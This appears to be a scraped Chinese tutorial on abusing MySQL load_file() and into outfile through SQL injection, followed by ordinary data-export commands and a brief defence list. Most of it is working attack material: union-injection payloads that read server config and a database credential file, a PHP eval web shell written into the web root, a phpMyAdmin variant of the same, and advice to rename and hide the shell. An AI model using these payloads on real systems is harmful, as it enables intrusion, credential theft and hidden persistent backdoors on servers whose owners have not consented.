2. 程式人生 > >mysql load_file()和 into outfile

mysql load_file()和 into outfile

阿新 發佈:2018-07-04
mysql服務器 init 數據導出 code httpd sel .com 12px host

0x00 load_file()

  • 條件:
1. 要有file_priv權限
2. 知道文件絕對路徑
3. 能使用union
4. 對web目錄有讀權限  
註:若過濾了單引號,則可以將函數中的字符進行hex編碼

  • 一般步驟

    • 讀/etc/init.d下的東西,這裏有配置文件路徑
    ?id=1‘ union select 1,2,load_file(‘/etc/init.d/httpd‘)
    • 得到web安裝路徑
    ?id=1‘ union select 1,2,load_file(‘/etc/apache/conf/httpd.conf‘)
    • 讀取密碼文件
    ?id=1‘ union select 1,2,load_file(‘/site/xxx.com/conf/conn.inc.php‘)

0x01 into outfile

  • 條件:
1. 要有file_priv權限  
2. 知道網站絕對路徑  
3. 要能用union  
4. 對web目錄有寫權限  
5. 沒有過濾單引號

  • 一般方法
    當知道路徑時,可以直接用?id=1 union select "<?php @eval($_POST[‘c‘]);?>" into outfile("C:/phpStudy/WWW/a.php")




  • 其他方法

    • 登陸phpMyAdmin
    use test;  選擇數據庫為test
create table aaa(bbb varchar(64));   在數據庫中創建一個表aaa
insert into aaa values("<?php @eval($_POST[‘c‘]);?>"); --在aaa中插入一條數據<?php @eval($_POST[‘c‘]);?>
select * from aaa into outfile ‘C:/phpStudy/WWW/a.php‘; --將aaa中的數據導出到文件a.php
    • localhost:80/a.php能訪問
    drop aaa; --刪除建立的表
    • 然後菜刀連接
    菜刀連接http://www.aa.com/a.php,然後更改shell的名字並將shell放在較隱蔽的地方,比如C:\phpStudy\WWW\phpMyAdmin\setup\lib\common.php

1、如果MYSQL服務器就是你要導出文件的機器,那麽可以直接用select …into outfile語句。

select * from rank into outfile "/home/a.txt"

2、如果MYSQL服務器是單獨的機器,我們是在一個client上進行操作,我們要把數據結果導入到client機器上。可以使用mysql -e語句。

mysql -uroot -proot -P3306 -h10.35.13.89 dbname -e "select * from rank" > /home/a.txt

3、使用mysql的tee(T)命令,也就是把MYSQL的所有輸出都輸入到指定文件。

mysql>tee /home/a.txt
mysql>select * from rank;
mysql>exit

mysql> \T output.txt
Logging to file ‘output.txt‘
mysql> \t
Outfile disabled.

0x02 防禦

  • 數據庫連接賬號不要用root權限
  • php關閉報錯模式
  • mysql賬戶沒有權限向網站目錄寫文件

mysql load_file()和 into outfile

相關推薦

mysql load_file() into outfile

mysql服務器 init 數據導出 code httpd sel .com 12px host 0x00 load_file() 條件: 1. 要有file_priv權限 2. 知道文件絕對路徑 3. 能使用union 4. 對web目錄有讀權限 註:若過濾

報錯注入邂逅load_file&into outfile搭訕LINES

https://xz.aliyun.com/t/2460 0x00 前言 近期分析mysql利用報錯注入讀取檔案內容,利用LINES TERMINATED BY在查詢只返回一個欄位時寫webshell檔案,以及如何利用load_file掃描判斷檔案是否存在。 0x01 into outf

解決:CentOS下MySQL執行select ... into outfile ...: Can't create/write to file '...' (Errcode: 13)

原因:selinux阻止寫入操作 解決:vi /etc/selinux/config # This file controls the state of SELinux on the system.

MySQL SELECT xxx INTO OUTFILE用法

重啟數據庫 rmi sta off -s int select value sid 1、導出數據報錯 mysql> SELECT * INTO OUTFILE ‘/tmp/t.txt‘ FIELDS TERMINATED BY ‘,‘ OPTIONALLY ENCLO

Oracle的MERGEMySql的replace into

在日常開發中經常會遇到先查詢 看看結果集有沒有如果有就執行操作沒有又執行咋樣的操作 (1).Oracle的MERGE MERGE INTO EMP1 T USING ( SELECT A.ID,A.NAME,A.PASSWORD FROM EMP A )S ON

轉載:MySQL INTO OUTFILE/INFILE匯出匯入資料

--使用SELECT ... INTO OUTFILE 以逗號分隔欄位的方式將資料匯入到一個檔案中: SELECT * INTO OUTFILE 'D:\\log1.txt' FIELDS TERMINATED BY ',' FROM log.log1 --將

mysql select into outfile報無許可權,訪問被拒絕

再使用into outfile的時候,報了下面的錯誤 ERROR 1045 (28000) at line 1: Access denied for user ‘ait_read’@’xx.xx.xx

解決select ... into outfile '..' mysql寫檔案許可權問題

select * from test into outfile '/home/user/test.txt' 在linux(centos)下 ,啟動了mysql 並給使用者檔案讀寫的權利 grant file on *.* to [email protected]

mysql中SELECT INTO INSERT INTO SELECT 兩種表複製語句

1.INSERT INTO SELECT語句       語句形式為:Insert into Table2(field1,field2,...) select value1,value2,... from Table1       要求目標表Table2必須存在,由於

Oracle的MERGEMySql的replace into 簡單應用介紹

   在日常開發中經常會遇到先查詢 看看結果集有沒有如果有就執行操作沒有又執行咋樣的操 (1).Oracle的MERGEMERGE INTO --要插入的表 別名 USING ( --查詢的SQL )別名 ON --(連線條件)

MySQL select into outfile用法

SELECT INTO…OUTFILE語句把表資料匯出到一個文字檔案中,並用LOAD DATA …INFILE語句恢復資料。但是這種方法只能匯出或匯入資料的內容,不包括表的結構,如果表的結構檔案損壞,則必須先恢復原來的表的結構。     一、SELECT INTO…OUTF

mysql5.7:mysql安裝基於SSL加密的主從復制(詳細剖析)

mysql ssl db 數據 加密傳輸 小生博客:http://xsboke.blog.51cto.com 小生 Q Q:1770058260 -------謝謝您的參考,如有疑問,歡迎交流目錄:--------my

MySQL】配置MySQL安裝遠程訪問步驟

image 新建 oar 最新 rest word clas 字段 sql安裝 以遠程服務器為例,安裝Mysql到Linux並配置遠程訪問,步驟如下: 1.下載安裝最新的rpm文件 方法一: rpm -Uvh http://repo.mysql.com/mysql-co

mysql管理基本操作

sql 修改root密碼 服務 blog sam www 網址 resolve 日誌 進去mysql:mysql –uroot –p 重啟數據庫:[[email protected]/* */ ~]# /etc/init.d/mysqld restart1.

MySQL--約束修改數據表總結

分享 cnblogs 總結 -- logs images http 修改 mysql MySQL--約束和修改數據表總結

mysql啟動關閉外鍵約束的方法

word nbsp 查看 set 外鍵約束 mysql 輸入 check select 關閉外鍵約束,輸入命令:SET FOREIGN_KEY_CHECKS=0; 啟動外鍵約束,輸入命令:SET FOREIGN_KEY_CHECKS=1; 查看當前是否有外鍵約束:SELEC

MySQL事務(一):InnoDB鎖(MySQL 官方文檔粗翻)

空間索引 系統 聚集索引 rds update 能夠 conf 沒有 得到   // 寫在前面,實際上,數據庫加鎖的類型和範圍受到多種因素的影響,例如數據庫隔離等級,SQL語句,是否使用主鍵、索引等等。可以查看博文: http://www.cnblogs.com/zhaoy

mysql優化類型

mysqlMySQL還支持選擇在該類型關鍵字後面的括號內指定整數值的顯示寬度(例如,INT(4))。int(M) 在 integer 數據類型中,M 表示最大顯示寬度,該可選顯示寬度規定用於顯示寬度小於指定的列寬度的值時從左側填滿寬度。 顯示寬度並不限制可以在列內保存的值的範圍,也不限制超過列的指定寬度的值的

mysql字符集排序介紹

mysq 簡體 binary set 服務器 客服 result system nic 客服端字符集: character_set_client utf8mb4連接字符集: character_set_connection utf8mb4數據庫字符集: character_

Linux數據庫:MYSQL啟用查看二進制日誌

server mail etc 文件 查看表 rom 查看 日誌 stat 在/etc/my.cnf文件中【mysqld】下加上: server-id = 1 (在整個Mysql集群中保證唯一) log-bin = binlog log-bin-index = binl